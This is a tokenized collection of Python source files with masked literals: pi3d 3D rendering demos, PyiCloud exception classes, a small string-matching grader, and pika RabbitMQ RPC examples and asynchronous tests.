"<STR_LIT>" , [ <NUM_LIT:1.0> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> ] , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> ] , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , - <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:0.5> , <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ] , <EOL> [ 
"<STR_LIT>" , [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT> ] ] , <EOL> [ "<STR_LIT>" , [ <NUM_LIT:0.1> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] ] ] <EOL> n_filter = len ( filter_list ) <EOL> i_filter = - <NUM_LIT:1> <EOL> cx , cz = <NUM_LIT> , <NUM_LIT> <EOL> c_rad = <NUM_LIT> <EOL> frame = <NUM_LIT:0> <EOL> st_time = time . time ( ) <EOL> while DISPLAY . loop_running ( ) : <EOL> if rot % <NUM_LIT> == <NUM_LIT:0.0> : <EOL> LOGGER . info ( "<STR_LIT>" . format ( filter_list [ i_filter % n_filter ] [ <NUM_LIT:0> ] , <EOL> <NUM_LIT> / ( time . time ( ) - st_time ) ) ) <EOL> i_filter = ( i_filter + <NUM_LIT:1> ) % n_filter <EOL> texetc = [ reflimg ] if ( i_filter < <NUM_LIT:3> ) else None <EOL> post = pi3d . PostProcess ( filter_list [ i_filter ] [ <NUM_LIT:0> ] , add_tex = texetc , scale = <NUM_LIT:0.5> ) <EOL> post . sprite . set_custom_data ( <NUM_LIT> , filter_list [ i_filter ] [ <NUM_LIT:1> ] ) <EOL> string = pi3d . String ( font = font , string = filter_list [ i_filter ] [ <NUM_LIT:0> ] , <EOL> camera = CAM2D , is_3d = False , x = <NUM_LIT:0> , y = - <NUM_LIT> , z = <NUM_LIT:0.5> ) <EOL> string . set_shader ( flatsh ) <EOL> st_time = time . time ( ) <EOL> if len ( filter_list [ i_filter ] ) > <NUM_LIT:2> : <EOL> for i , delta in enumerate ( filter_list [ i_filter ] [ <NUM_LIT:2> ] ) : <EOL> post . sprite . set_custom_data ( <NUM_LIT> + i , [ filter_list [ i_filter ] [ <NUM_LIT:1> ] [ i ] + rot * delta ] ) <EOL> xm = cx + math . sin ( math . radians ( rot ) ) * c_rad <EOL> zm = cz - math . cos ( math . radians ( rot ) ) * c_rad <EOL> ym = mymap . calcHeight ( xm , zm ) + avhgt <EOL> rot += <NUM_LIT:1.0> <EOL> CAMERA . reset ( ) <EOL> CAMERA . rotate ( tilt , rot + <NUM_LIT> , <NUM_LIT:0> ) <EOL> CAMERA . position ( ( xm , ym , zm ) ) <EOL> post . start_capture ( ) <EOL> monument . draw ( ) <EOL> mytrees1 . draw ( ) <EOL> mytrees2 . draw ( ) <EOL> mytrees3 . draw ( ) <EOL> mymap . 
draw ( ) <EOL> myecube . draw ( ) <EOL> post . end_capture ( ) <EOL> post . draw ( ) <EOL> string . draw ( ) <EOL> frame += <NUM_LIT:1> <EOL> k = mykeys . read ( ) <EOL> if k > - <NUM_LIT:1> : <EOL> if k == <NUM_LIT> : <EOL> pi3d . screenshot ( "<STR_LIT>" + str ( scshots ) + "<STR_LIT>" ) <EOL> scshots += <NUM_LIT:1> <EOL> elif k == <NUM_LIT:10> : <EOL> mc = <NUM_LIT:0> <EOL> elif k == <NUM_LIT> : <EOL> mykeys . close ( ) <EOL> DISPLAY . stop ( ) <EOL> break <EOL> CAMERA . was_moved = False </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> """<STR_LIT>""" <EOL> import math <EOL> import demo <EOL> import pi3d <EOL> DISPLAY = pi3d . Display . create ( x = <NUM_LIT> , y = <NUM_LIT> , background = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) ) <EOL> shader = pi3d . Shader ( "<STR_LIT>" ) <EOL> flatsh = pi3d . Shader ( "<STR_LIT>" ) <EOL> blockimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> roofedgeimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> roofimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> greenimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> ectex = pi3d . loadECfiles ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> myecube = pi3d . EnvironmentCube ( size = <NUM_LIT> , maptype = "<STR_LIT>" ) <EOL> myecube . set_draw_details ( flatsh , ectex ) <EOL> mapwidth = <NUM_LIT> <EOL> mapdepth = <NUM_LIT> <EOL> mapheight = <NUM_LIT> <EOL> floorimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> bumpimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> mymap = pi3d . ElevationMap ( mapfile = "<STR_LIT>" , <EOL> width = mapwidth , depth = mapdepth , height = mapheight , <EOL> divx = <NUM_LIT:64> , divy = <NUM_LIT:64> ) <EOL> mymap . set_draw_details ( shader , [ floorimg , bumpimg ] , <NUM_LIT> , <NUM_LIT:0.0> ) <EOL> mymap . set_fog ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> ) , <NUM_LIT> ) <EOL> pi3d . corridor ( <EOL> <NUM_LIT> , <NUM_LIT:10> , mymap , <EOL> details = [ shader , [ blockimg , blockimg ] , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , walls = "<STR_LIT>" ) <EOL> pi3d . 
corridor ( <EOL> <NUM_LIT> , - <NUM_LIT> , mymap , <EOL> details = [ shader , [ blockimg , blockimg ] , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , walls = "<STR_LIT>" ) <EOL> openSectionSchemeMultimodel = { <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> ( <NUM_LIT:0> , None ) : [ [ "<STR_LIT:R>" , <NUM_LIT:2> ] ] , <EOL> ( <NUM_LIT:2> , None ) : [ [ "<STR_LIT:C>" , <NUM_LIT:0> ] , [ "<STR_LIT:R>" , <NUM_LIT:2> ] ] , <EOL> ( <NUM_LIT:0> , <NUM_LIT:0> , "<STR_LIT>" ) : [ [ "<STR_LIT>" , <NUM_LIT:0> ] , [ "<STR_LIT>" , <NUM_LIT:3> ] ] , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0> , "<STR_LIT>" ) : [ [ "<STR_LIT>" , <NUM_LIT:0> ] , [ "<STR_LIT>" , <NUM_LIT:3> ] ] , <EOL> ( <NUM_LIT:2> , <NUM_LIT:0> , "<STR_LIT>" ) : [ [ "<STR_LIT>" , <NUM_LIT:0> ] , [ "<STR_LIT>" , <NUM_LIT:3> ] ] , <EOL> ( <NUM_LIT:2> , <NUM_LIT:2> , "<STR_LIT>" ) : [ [ "<STR_LIT>" , <NUM_LIT:3> ] ] , <EOL> ( <NUM_LIT:2> , <NUM_LIT:0> ) : [ [ "<STR_LIT>" , <NUM_LIT:0> ] ] , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0> ) : [ [ "<STR_LIT>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:3> ] ] , <EOL> ( <NUM_LIT:1> , <NUM_LIT:2> ) : [ [ "<STR_LIT>" , <NUM_LIT:3> ] ] } <EOL> details = [ <EOL> [ shader , [ blockimg , blockimg ] , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ shader , [ greenimg , greenimg ] , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ shader , [ roofimg , blockimg ] , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ shader , [ roofedgeimg ] , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> ] <EOL> building = pi3d . Building ( <EOL> "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:0> , mymap , <EOL> width = <NUM_LIT> , depth = <NUM_LIT> , height = <NUM_LIT> , name = "<STR_LIT>" , draw_details = details , <EOL> yoff = - <NUM_LIT> , scheme = openSectionSchemeMultimodel ) <EOL> outLight = pi3d . 
Light ( lightpos = ( <NUM_LIT:10> , - <NUM_LIT:10> , <NUM_LIT:20> ) , lightcol = ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ) , lightamb = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> inLight = pi3d . Light ( lightpos = ( <NUM_LIT:10> , - <NUM_LIT:10> , <NUM_LIT:20> ) , lightcol = ( <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> ) , lightamb = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> ) ) <EOL> for b in building . model : <EOL> b . set_light ( inLight , <NUM_LIT:0> ) <EOL> mymap . set_light ( inLight , <NUM_LIT:0> ) <EOL> inFlag = True <EOL> scshots = <NUM_LIT:1> <EOL> rot = <NUM_LIT:0.0> <EOL> tilt = <NUM_LIT:0.0> <EOL> avhgt = <NUM_LIT> <EOL> aveyelevel = <NUM_LIT> <EOL> aveyeleveladjust = aveyelevel - avhgt / <NUM_LIT:2> <EOL> man = pi3d . SolidObject ( <EOL> "<STR_LIT>" , pi3d . Size ( <NUM_LIT:1> , avhgt , <NUM_LIT:1> ) , <EOL> pi3d . Position ( <NUM_LIT:0> , ( mymap . calcHeight ( <NUM_LIT:5> , <NUM_LIT:5> ) + avhgt / <NUM_LIT:2> ) , <NUM_LIT:0> ) , <NUM_LIT:1> ) <EOL> inputs = pi3d . InputEvents ( ) <EOL> inputs . get_mouse_movement ( ) <EOL> mouseOn = True <EOL> frame = <NUM_LIT> <EOL> record = False <EOL> CAMERA = pi3d . Camera . instance ( ) <EOL> while DISPLAY . loop_running ( ) and not inputs . key_state ( "<STR_LIT>" ) : <EOL> CAMERA . reset ( ) <EOL> CAMERA . rotate ( tilt , rot , <NUM_LIT:0> ) <EOL> CAMERA . position ( ( man . x ( ) , man . y ( ) , man . z ( ) - aveyeleveladjust ) ) <EOL> myecube . position ( man . x ( ) , man . y ( ) , man . z ( ) - aveyeleveladjust ) <EOL> pi3d . SolidObject . drawall ( ) <EOL> building . drawAll ( ) <EOL> mymap . draw ( ) <EOL> myecube . draw ( ) <EOL> inputs . do_input_events ( ) <EOL> """<STR_LIT>""" <EOL> mx , my , mv , mh , md = inputs . get_mouse_movement ( ) <EOL> rot -= ( mx ) * <NUM_LIT> <EOL> tilt -= ( my ) * <NUM_LIT> <EOL> jrx , jry = inputs . 
get_joystickR ( ) <EOL> if abs ( jrx ) > <NUM_LIT:0.1> : <EOL> rot -= jrx * <NUM_LIT:3> <EOL> if abs ( jry ) > <NUM_LIT:0.1> : <EOL> tilt -= jry * <NUM_LIT:3> <EOL> xm = man . x ( ) <EOL> ym = man . y ( ) <EOL> zm = man . z ( ) <EOL> jx , jy = inputs . get_joystick ( ) <EOL> if abs ( jy ) > <NUM_LIT> : <EOL> xm += math . sin ( math . radians ( rot ) ) * jy <EOL> zm -= math . cos ( math . radians ( rot ) ) * jy <EOL> if abs ( jx ) > <NUM_LIT> : <EOL> xm -= math . sin ( math . radians ( rot - <NUM_LIT> ) ) * jx <EOL> zm += math . cos ( math . radians ( rot - <NUM_LIT> ) ) * jx <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> xm -= math . sin ( math . radians ( rot ) ) <EOL> zm += math . cos ( math . radians ( rot ) ) <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> xm -= math . sin ( math . radians ( rot ) ) <EOL> zm += math . cos ( math . radians ( rot ) ) <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> xm += math . sin ( math . radians ( rot ) ) <EOL> zm -= math . cos ( math . radians ( rot ) ) <EOL> ym = ( mymap . calcHeight ( xm , zm ) + avhgt ) <EOL> NewPos = pi3d . Position ( xm , ym , zm ) <EOL> collisions = man . CollisionList ( NewPos ) <EOL> if not collisions : <EOL> man . move ( NewPos ) <EOL> if inFlag and abs ( man . z ( ) - building . zpos ) > <NUM_LIT> : <EOL> inFlag = False <EOL> for b in building . model : <EOL> b . set_light ( outLight , <NUM_LIT:0> ) <EOL> mymap . set_light ( outLight , <NUM_LIT:0> ) <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> tilt -= <NUM_LIT> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> tilt += <NUM_LIT> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> rot += <NUM_LIT:2> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> rot -= <NUM_LIT:2> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> while inputs . key_state ( "<STR_LIT>" ) : <EOL> inputs . do_input_events ( ) <EOL> pi3d . screenshot ( "<STR_LIT>" + str ( scshots ) + "<STR_LIT>" ) <EOL> scshots += <NUM_LIT:1> <EOL> if inputs . 
key_state ( "<STR_LIT>" ) : <EOL> mc = <NUM_LIT:0> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> while inputs . key_state ( "<STR_LIT>" ) : <EOL> inputs . do_input_events ( ) <EOL> mouseOn != mouseOn <EOL> inputs . grab_by_type ( "<STR_LIT>" , grab = mouseOn ) <EOL> inputs . release ( ) <EOL> DISPLAY . destroy ( ) </s>
<s> class PyiCloudException ( Exception ) : <EOL> pass <EOL> class PyiCloudNoDevicesException ( PyiCloudException ) : <EOL> pass <EOL> class PyiCloudAPIResponseError ( PyiCloudException ) : <EOL> def __init__ ( self , reason , code ) : <EOL> self . reason = reason <EOL> self . code = code <EOL> message = reason <EOL> if code : <EOL> message += "<STR_LIT>" % code <EOL> super ( PyiCloudAPIResponseError , self ) . __init__ ( message ) <EOL> class PyiCloudFailedLoginException ( PyiCloudException ) : <EOL> pass <EOL> class PyiCloud2FARequiredError ( PyiCloudException ) : <EOL> def __init__ ( self , url ) : <EOL> message = "<STR_LIT>" % url <EOL> super ( PyiCloud2FARequiredError , self ) . __init__ ( message ) <EOL> class PyiCloudNoDevicesException ( Exception ) : <EOL> pass <EOL> class NoStoredPasswordAvailable ( PyiCloudException ) : <EOL> pass <EOL> class PyiCloudBinaryFeedParseError ( Exception ) : <EOL> pass <EOL> class PyiCloudPhotoLibraryNotActivatedErrror ( Exception ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> def grade ( autogen , key ) : <EOL> if '<STR_LIT>' in key : <EOL> return ( True , '<STR_LIT>' ) <EOL> else : <EOL> return ( False , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import pika <EOL> SERVER_QUEUE = '<STR_LIT>' <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> with pika . BlockingConnection ( ) as conn : <EOL> channel = conn . channel ( ) <EOL> channel . queue_declare ( queue = SERVER_QUEUE , <EOL> exclusive = True , <EOL> auto_delete = True ) <EOL> channel . basic_consume ( on_server_rx_rpc_request , queue = SERVER_QUEUE ) <EOL> channel . basic_consume ( on_client_rx_reply_from_server , <EOL> queue = '<STR_LIT>' , <EOL> no_ack = True ) <EOL> channel . basic_publish ( <EOL> exchange = '<STR_LIT>' , <EOL> routing_key = SERVER_QUEUE , <EOL> body = '<STR_LIT>' , <EOL> properties = pika . BasicProperties ( reply_to = '<STR_LIT>' ) ) <EOL> channel . start_consuming ( ) <EOL> def on_server_rx_rpc_request ( ch , method_frame , properties , body ) : <EOL> print '<STR_LIT>' , body <EOL> ch . basic_publish ( '<STR_LIT>' , routing_key = properties . reply_to , body = '<STR_LIT>' ) <EOL> ch . basic_ack ( delivery_tag = method_frame . delivery_tag ) <EOL> print '<STR_LIT>' <EOL> def on_client_rx_reply_from_server ( ch , method_frame , properties , body ) : <EOL> print '<STR_LIT>' , body <EOL> print '<STR_LIT>' <EOL> ch . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import time <EOL> import uuid <EOL> from pika import spec <EOL> from pika . compat import as_bytes <EOL> import pika . connection <EOL> import pika . frame <EOL> import pika . spec <EOL> from async_test_base import ( AsyncTestCase , BoundQueueTestCase , AsyncAdapters ) <EOL> class TestA_Connect ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . stop ( ) <EOL> class TestConfirmSelect ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> channel . _on_selectok = self . on_complete <EOL> channel . confirm_delivery ( ) <EOL> def on_complete ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Confirm . SelectOk ) <EOL> self . stop ( ) <EOL> class TestBlockingNonBlockingBlockingRPCWontStall ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def begin ( self , channel ) : <EOL> self . _expected_queue_params = ( <EOL> ( "<STR_LIT>" + uuid . uuid1 ( ) . hex , False ) , <EOL> ( "<STR_LIT>" + uuid . uuid1 ( ) . hex , True ) , <EOL> ( "<STR_LIT>" + uuid . uuid1 ( ) . hex , False ) <EOL> ) <EOL> self . _declared_queue_names = [ ] <EOL> for queue , nowait in self . _expected_queue_params : <EOL> channel . queue_declare ( callback = self . _queue_declare_ok_cb <EOL> if not nowait else None , <EOL> queue = queue , <EOL> auto_delete = True , <EOL> nowait = nowait , <EOL> arguments = { '<STR_LIT>' : self . TIMEOUT * <NUM_LIT:1000> } ) <EOL> def _queue_declare_ok_cb ( self , declare_ok_frame ) : <EOL> self . _declared_queue_names . append ( declare_ok_frame . method . queue ) <EOL> if len ( self . _declared_queue_names ) == <NUM_LIT:2> : <EOL> self . channel . queue_declare ( callback = self . _queue_declare_ok_cb , <EOL> queue = self . _expected_queue_params [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , <EOL> passive = True , <EOL> nowait = False ) <EOL> elif len ( self . 
_declared_queue_names ) == <NUM_LIT:3> : <EOL> self . assertSequenceEqual ( <EOL> sorted ( self . _declared_queue_names ) , <EOL> sorted ( item [ <NUM_LIT:0> ] for item in self . _expected_queue_params ) ) <EOL> self . stop ( ) <EOL> class TestConsumeCancel ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . queue_name = self . __class__ . __name__ + '<STR_LIT::>' + uuid . uuid1 ( ) . hex <EOL> channel . queue_declare ( self . on_queue_declared , queue = self . queue_name ) <EOL> def on_queue_declared ( self , frame ) : <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:100> ) : <EOL> msg_body = '<STR_LIT>' . format ( self . __class__ . __name__ , i , <EOL> time . time ( ) ) <EOL> self . channel . basic_publish ( '<STR_LIT>' , self . queue_name , msg_body ) <EOL> self . ctag = self . channel . basic_consume ( self . on_message , <EOL> queue = self . queue_name , <EOL> no_ack = True ) <EOL> def on_message ( self , _channel , _frame , _header , body ) : <EOL> self . channel . basic_cancel ( self . on_cancel , self . ctag ) <EOL> def on_cancel ( self , _frame ) : <EOL> self . channel . queue_delete ( self . on_deleted , self . queue_name ) <EOL> def on_deleted ( self , _frame ) : <EOL> self . stop ( ) <EOL> class TestExchangeDeclareAndDelete ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> X_TYPE = '<STR_LIT>' <EOL> def begin ( self , channel ) : <EOL> self . name = self . __class__ . __name__ + '<STR_LIT::>' + uuid . uuid1 ( ) . hex <EOL> channel . exchange_declare ( self . on_exchange_declared , self . name , <EOL> exchange_type = self . X_TYPE , <EOL> passive = False , <EOL> durable = False , <EOL> auto_delete = True ) <EOL> def on_exchange_declared ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Exchange . DeclareOk ) <EOL> self . channel . exchange_delete ( self . on_exchange_delete , self . 
name ) <EOL> def on_exchange_delete ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Exchange . DeleteOk ) <EOL> self . stop ( ) <EOL> class TestExchangeRedeclareWithDifferentValues ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> X_TYPE1 = '<STR_LIT>' <EOL> X_TYPE2 = '<STR_LIT>' <EOL> def begin ( self , channel ) : <EOL> self . name = self . __class__ . __name__ + '<STR_LIT::>' + uuid . uuid1 ( ) . hex <EOL> self . channel . add_on_close_callback ( self . on_channel_closed ) <EOL> channel . exchange_declare ( self . on_exchange_declared , self . name , <EOL> exchange_type = self . X_TYPE1 , <EOL> passive = False , <EOL> durable = False , <EOL> auto_delete = True ) <EOL> def on_cleanup_channel ( self , channel ) : <EOL> channel . exchange_delete ( None , self . name , nowait = True ) <EOL> self . stop ( ) <EOL> def on_channel_closed ( self , channel , reply_code , reply_text ) : <EOL> self . connection . channel ( self . on_cleanup_channel ) <EOL> def on_exchange_declared ( self , frame ) : <EOL> self . channel . exchange_declare ( self . on_bad_result , self . name , <EOL> exchange_type = self . X_TYPE2 , <EOL> passive = False , <EOL> durable = False , <EOL> auto_delete = True ) <EOL> def on_bad_result ( self , frame ) : <EOL> self . channel . exchange_delete ( None , self . name , nowait = True ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> class TestQueueDeclareAndDelete ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> channel . queue_declare ( self . on_queue_declared , <EOL> passive = False , <EOL> durable = False , <EOL> exclusive = True , <EOL> auto_delete = False , <EOL> nowait = False , <EOL> arguments = { '<STR_LIT>' : self . TIMEOUT * <NUM_LIT:1000> } ) <EOL> def on_queue_declared ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Queue . DeclareOk ) <EOL> self . channel . queue_delete ( self . 
on_queue_delete , frame . method . queue ) <EOL> def on_queue_delete ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Queue . DeleteOk ) <EOL> self . stop ( ) <EOL> class TestQueueNameDeclareAndDelete ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . _q_name = self . __class__ . __name__ + '<STR_LIT::>' + uuid . uuid1 ( ) . hex <EOL> channel . queue_declare ( self . on_queue_declared , self . _q_name , <EOL> passive = False , <EOL> durable = False , <EOL> exclusive = True , <EOL> auto_delete = True , <EOL> nowait = False , <EOL> arguments = { '<STR_LIT>' : self . TIMEOUT * <NUM_LIT:1000> } ) <EOL> def on_queue_declared ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Queue . DeclareOk ) <EOL> self . assertEqual ( frame . method . queue , self . _q_name ) <EOL> self . channel . queue_delete ( self . on_queue_delete , frame . method . queue ) <EOL> def on_queue_delete ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Queue . DeleteOk ) <EOL> self . stop ( ) <EOL> class TestQueueRedeclareWithDifferentValues ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . _q_name = self . __class__ . __name__ + '<STR_LIT::>' + uuid . uuid1 ( ) . hex <EOL> self . channel . add_on_close_callback ( self . on_channel_closed ) <EOL> channel . queue_declare ( self . on_queue_declared , self . _q_name , <EOL> passive = False , <EOL> durable = False , <EOL> exclusive = True , <EOL> auto_delete = True , <EOL> nowait = False , <EOL> arguments = { '<STR_LIT>' : self . TIMEOUT * <NUM_LIT:1000> } ) <EOL> def on_channel_closed ( self , channel , reply_code , reply_text ) : <EOL> self . stop ( ) <EOL> def on_queue_declared ( self , frame ) : <EOL> self . channel . queue_declare ( self . on_bad_result , self . 
_q_name , <EOL> passive = False , <EOL> durable = True , <EOL> exclusive = False , <EOL> auto_delete = True , <EOL> nowait = False , <EOL> arguments = { '<STR_LIT>' : self . TIMEOUT * <NUM_LIT:1000> } ) <EOL> def on_bad_result ( self , frame ) : <EOL> self . channel . queue_delete ( None , self . _q_name , nowait = True ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> class TestTX1_Select ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> channel . tx_select ( self . on_complete ) <EOL> def on_complete ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . SelectOk ) <EOL> self . stop ( ) <EOL> class TestTX2_Commit ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> channel . tx_select ( self . on_selectok ) <EOL> def on_selectok ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . SelectOk ) <EOL> self . channel . tx_commit ( self . on_commitok ) <EOL> def on_commitok ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . CommitOk ) <EOL> self . stop ( ) <EOL> class TestTX2_CommitFailure ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . channel . add_on_close_callback ( self . on_channel_closed ) <EOL> self . channel . tx_commit ( self . on_commitok ) <EOL> def on_channel_closed ( self , channel , reply_code , reply_text ) : <EOL> self . stop ( ) <EOL> def on_selectok ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . SelectOk ) <EOL> @ staticmethod <EOL> def on_commitok ( frame ) : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> class TestTX3_Rollback ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> channel . tx_select ( self . on_selectok ) <EOL> def on_selectok ( self , frame ) : <EOL> self . 
assertIsInstance ( frame . method , spec . Tx . SelectOk ) <EOL> self . channel . tx_rollback ( self . on_rollbackok ) <EOL> def on_rollbackok ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . RollbackOk ) <EOL> self . stop ( ) <EOL> class TestTX3_RollbackFailure ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . channel . add_on_close_callback ( self . on_channel_closed ) <EOL> self . channel . tx_rollback ( self . on_commitok ) <EOL> def on_channel_closed ( self , channel , reply_code , reply_text ) : <EOL> self . stop ( ) <EOL> @ staticmethod <EOL> def on_commitok ( frame ) : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> class TestZ_PublishAndConsume ( BoundQueueTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def on_ready ( self , frame ) : <EOL> self . ctag = self . channel . basic_consume ( self . on_message , self . queue ) <EOL> self . msg_body = "<STR_LIT>" % ( self . __class__ . __name__ , time . time ( ) ) <EOL> self . channel . basic_publish ( self . exchange , self . routing_key , <EOL> self . msg_body ) <EOL> def on_cancelled ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Basic . CancelOk ) <EOL> self . stop ( ) <EOL> def on_message ( self , channel , method , header , body ) : <EOL> self . assertIsInstance ( method , spec . Basic . Deliver ) <EOL> self . assertEqual ( body , as_bytes ( self . msg_body ) ) <EOL> self . channel . basic_ack ( method . delivery_tag ) <EOL> self . channel . basic_cancel ( self . on_cancelled , self . ctag ) <EOL> class TestZ_PublishAndConsumeBig ( BoundQueueTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> @ staticmethod <EOL> def _get_msg_body ( ) : <EOL> return '<STR_LIT:\n>' . join ( [ "<STR_LIT:%s>" % i for i in range ( <NUM_LIT:0> , <NUM_LIT> ) ] ) <EOL> def on_ready ( self , frame ) : <EOL> self . ctag = self . channel . basic_consume ( self . 
on_message , self . queue ) <EOL> self . msg_body = self . _get_msg_body ( ) <EOL> self . channel . basic_publish ( self . exchange , self . routing_key , <EOL> self . msg_body ) <EOL> def on_cancelled ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Basic . CancelOk ) <EOL> self . stop ( ) <EOL> def on_message ( self , channel , method , header , body ) : <EOL> self . assertIsInstance ( method , spec . Basic . Deliver ) <EOL> self . assertEqual ( body , as_bytes ( self . msg_body ) ) <EOL> self . channel . basic_ack ( method . delivery_tag ) <EOL> self . channel . basic_cancel ( self . on_cancelled , self . ctag ) <EOL> class TestZ_PublishAndGet ( BoundQueueTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def on_ready ( self , frame ) : <EOL> self . msg_body = "<STR_LIT>" % ( self . __class__ . __name__ , time . time ( ) ) <EOL> self . channel . basic_publish ( self . exchange , self . routing_key , <EOL> self . msg_body ) <EOL> self . channel . basic_get ( self . on_get , self . queue ) <EOL> def on_get ( self , channel , method , header , body ) : <EOL> self . assertIsInstance ( method , spec . 